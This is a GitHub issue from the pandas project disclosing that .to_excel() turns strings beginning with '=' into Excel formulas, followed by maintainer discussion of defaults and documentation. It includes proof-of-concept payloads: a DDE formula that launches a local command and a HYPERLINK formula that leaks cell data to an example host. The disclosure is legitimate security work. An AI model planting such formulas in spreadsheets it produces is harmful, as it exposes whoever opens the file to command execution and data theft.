Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Excel formula injection in pandas .to_excel() #29095

Open
randomstuff opened this issue Oct 19, 2019 · 10 comments
Open

Excel formula injection in pandas .to_excel() #29095

randomstuff opened this issue Oct 19, 2019 · 10 comments
Labels
Docs IO Excel read_excel, to_excel

Comments

@randomstuff
Copy link
Contributor

Code Sample

import pandas as pd
df = pd.DataFrame([
    "simple string",
    "=2+5+cmd|' /C calc'!A0",
])
df.to_excel("pandas_minimal.xlsx", header=False, index=False, engine="openpyxl")

Problem description

When exporting DataFrames to Excel files (.xlsx) , pandas converts strings starting with = into Excel formulas. This happens with both .xlsx engines (openpyxl and xlsxwriter).

Expected Output

I expect the Excel file to contain a cell with the text:

=2+5+cmd|' /C calc'!A0"

This a correctness issue: this is probably not what the user expects (especially since this behavior is not documented).

I'd argue this is a security vulnerability as well.

Security considerations

I think this is is a vulnerability in pandas as it could be used by an attacker to inject Excel formulas in the generated .xslx file: this could be used to trigger shell command execution (when opened in
Excel) and data exfiltration (works on LibreOffice as well).

Relationship with CSV injection

This is different from CSV-based injection (but related).

When using the CSV format, cells starting with = do not have to be considered as formula: this is the consuming software fault if it is processing the data as formula and we can argue [2] that it is not a security issue in the producing software. Moreover there is not clear way to prevent this from happening from the producing software without altering the original data.

However, when exporting to Excel files, each cell can be typed either as string or formula and it is possible to have cells starting with = which are not formulas: it is the producing software responsibility to generate the correct cell.

I would even argue that converting to Excel files instead of CSV files would be a safer route when producing files to be consumed by spreadsheet software because we can prevent this injection from
happening.

Example 1: shell command execution

Here's a minimal example (derived from [4]):

import pandas as pd
df = pd.DataFrame([
    "simple string",
    "=2+5+cmd|' /C calc'!A0",
])
df.to_excel("pandas_minimal.xlsx", header=False, index=False, engine="openpyxl")

The resulting XSLX file contains:

$ unzip -p pandas_minimal.xlsx xl/worksheets/sheet1.xml | xmllint --format -
<?xml version="1.0"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <sheetPr>
    <outlinePr summaryBelow="1" summaryRight="1"/>
    <pageSetUpPr/>
  </sheetPr>
  <dimension ref="A1:A2"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="8" defaultRowHeight="15"/>
  <sheetData>
    <row r="1">
      <c r="A1" t="inlineStr">
        <is>
          <t>simple string</t> <!-- This is a plain string. -->
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2">
        <f>2+5+cmd|' /C calc'!A0</f> <-- This is a formula. -->
        <v/>
      </c>
    </row>
  </sheetData>
  <pageMargins bottom="1" footer="0.5" header="0.5" left="0.75" right="0.75" top="1"/>
</worksheet>

Notice how the first cell was interpreted as a plain string:

<t>simple string</t>

whereas the second was expanded as a Excel formula:

<f>2+5+cmd|' /C calc'!A0</f>

This happens with both XLSX backends (XlsxWriter) and (OpenPyxl). It could be argued that the problem actually lies in the underlying libraries. It is however possible to prevent the formula injections when using these two libraries. I have patches which fix this issue in pandas (see pull request).

In Excel, this formula can execute a local system command. When used with this payload, Excel actually warns before executing the shell command [1]:

Remote data not accessible

To access this data Excel needs to start another application. Some
legitimate applications and your computer could be used maliciously
to spread viruses or damage your computer. Only click Yes if you
trust the source of this workbook and you want to let the workbook
start the application.

The Excel file might actually be coming from a trusted source (a trusted pandas script executed from a trusted environment): the user would then legitimately want to click on "Yes". However, an attacker
could exploit this behavior in pandas to inject a malicious formula in the trusted Excel file.

Example 2: data exfiltration

Another possibility (which can be triggered through LibreOffice) is data exfiltration from the Excel file to a remote server:

Let's take this example (derived from [3]):

import pandas as pd
df = pd.DataFrame([
    "some data",
    '=HYPERLINK("http://www.example.com?leak="&B2,"Error, click for details")',
])
df.to_excel("data-exfiltration.xlsx")

It generates a link to:

http://www.example.com/?leak=some%20data

Clicking on this link can be used to exfiltrate data (in this case, the B2 cell from the spreadsheet to a remote server.

References

[1] https://youtu.be/C1o5uVOaufU?t=364
[2] https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection
[3] https://www.notsosecure.com/data-exfiltration-formula-injection/
[4] http://georgemauer.net/2017/10/07/csv-injection.html

Resolution

I think the proper way to handle this is to disable Excel formula injection through .to_excel().

If this behavior is useful for some user, this might be controlled with a parameter of .to_excel(). In this case, the documentation should probably include a warning about the security implications of
enabling this feature. I believe it would be safer to disable this option by default at some point (eg. for pandas 1.0).

Output of pd.show_versions()

commit: None
python: 3.7.5.candidate.1
python-bits: 64
OS: Linux
OS-release: 5.2.0-3-amd64
machine: x86_64
processor: 
byteorder: little
LC_ALL: None
LANG: fr_FR.utf8
LOCALE: fr_FR.UTF-8

pandas: 0.23.3
pytest: 3.10.1
pip: 18.1
setuptools: 41.2.0
Cython: None
numpy: 1.16.5
scipy: 1.2.2
pyarrow: None
xarray: None
IPython: 5.8.0
sphinx: None
patsy: None
dateutil: 2.7.3
pytz: 2019.2
blosc: None
bottleneck: None
tables: 3.5.2
numexpr: 2.7.0
feather: None
matplotlib: 3.0.2
openpyxl: 2.4.9
xlrd: 1.1.0
xlwt: 1.3.0
xlsxwriter: None
lxml: 4.4.1
bs4: 4.8.0
html5lib: 1.0.1
sqlalchemy: None
pymysql: None
psycopg2: None
jinja2: 2.10.1
s3fs: None
fastparquet: None
pandas_gbq: None
pandas_datareader: None

@TomAugspurger
Copy link
Contributor

This a correctness issue: this is probably not what the user expects (especially since this behavior is not documented).

Why do you think that? It's not clear to me one way or another.

It could be argued that the problem actually lies in the underlying libraries.

The default behavior of both of openpyxl and xlsxwriter is to treat strings starting with = as formula? I'd prefer to not take an opinion, and instead defer to the default behavior of the underlying engines. An config option would probably be welcome (cc @WillAyd if you have thoughts).

@randomstuff
Copy link
Contributor Author

Why do you think that? It's not clear to me one way or another.

One reason why I think this should not happen by default is that it's not documented. There is no reason for tabular data cells starting with = to turn into script. There is not even anything special about the XSLX file format with cells starting with = AFAIU.

One other reason why I think this should not happen (or at least be configurable) is that the pandas user might legitimately need to generate cells with text/data starting with =. It's currently not possible using .to_html().

One last reason is that this can be a security vulnerability. :)

The default behavior of both of openpyxl and xlsxwriter is to treat strings starting with = as formula?

Yes, this is the default behavior of these librairies.

I think this behavior of these libraries is discutable as it can easily open security issues in software using these librairies. It's trying to be helpful but it really is dangerous (*). It would probably be better for them to migrate to a safer default (and warn about the security considerations around this) and add warnings about this in the documenration.

However, both libraries provide a way to prevent this from happening which is actually not possible in pandas.

(*): This is not unlike PyYaml moving away from unsafe YAML loading by default. Using unsafe YAML loading by default was very convenient but was quite dangerous.

@TomAugspurger
Copy link
Contributor

Have you opened issues with openpyxl and xlwt?

@randomstuff
Copy link
Contributor Author

I did not (yet) because I did not consider it was clearly a vulnerability in openpyxl and xlsxwriter.

@gfyoung
Copy link
Member

gfyoung commented Oct 24, 2019

FWIW: I think we also had a Tidelift discussion for this too...

@jreback
Copy link
Contributor

jreback commented Oct 24, 2019

However, both libraries provide a way to prevent this from happening which is actually not possible in pandas

how is this true at all? we pass thru construction options already; xlxswriter has an option for safe handling and that is our default engine

@TomAugspurger
Copy link
Contributor

It seems xlsxwritier isn't going to change their default: jmcnamara/XlsxWriter#663

At this point, I think the best option is to add an example to the pandas docs about how to properly pass through the option to the engine. Are you interested in working on that @randomstuff?

@jmcnamara
Copy link
Contributor

At this point, I think the best option is to add an example to the pandas docs about how to properly pass through the option to the engine.

For reference, here is an example from the XlsxWriter docs that shows how to pass XlsxWriter options via the Pandas interface.

https://xlsxwriter.readthedocs.io/working_with_pandas.html#passing-xlsxwriter-constructor-options-to-pandas

@randomstuff
Copy link
Contributor Author

https://xlsxwriter.readthedocs.io/working_with_pandas.html#passing-xlsxwriter-constructor-options-to-pandas

Would it make sense to be able to pass options in to_html() instead of having to explicitely use a pd.ExcelWriter`?

@randomstuff
Copy link
Contributor Author

Wouldn't it better to make formula expansion an optin? It would be a slight breaking change in the API but it would make the API Excel output more consistent with the other ones by default:

import pandas as pd
df = pd.DataFrame(["=a"])
df.to_excel("test.xlsx")
df.to_html("test.html")

People actually needing formula would only need to add an option to to_excel().

@TomAugspurger, Yes, I might be interested in doing that. If formula expansion (by default) is considered a feature instead of a bug, I think I should document about this behavior in the to_excel() documentation and warn about the security implications.

@jbrockmendel jbrockmendel added the IO Excel read_excel, to_excel label Oct 28, 2019
@mroeschke mroeschke added the Docs label May 8, 2020
@jreback jreback added this to the 1.4 milestone Jul 6, 2021
@jreback jreback modified the milestones: 1.4, Contributions Welcome Jan 8, 2022
@mroeschke mroeschke removed this from the Contributions Welcome milestone Oct 13, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Docs IO Excel read_excel, to_excel
Projects
None yet
Development

Successfully merging a pull request may close this issue.

7 participants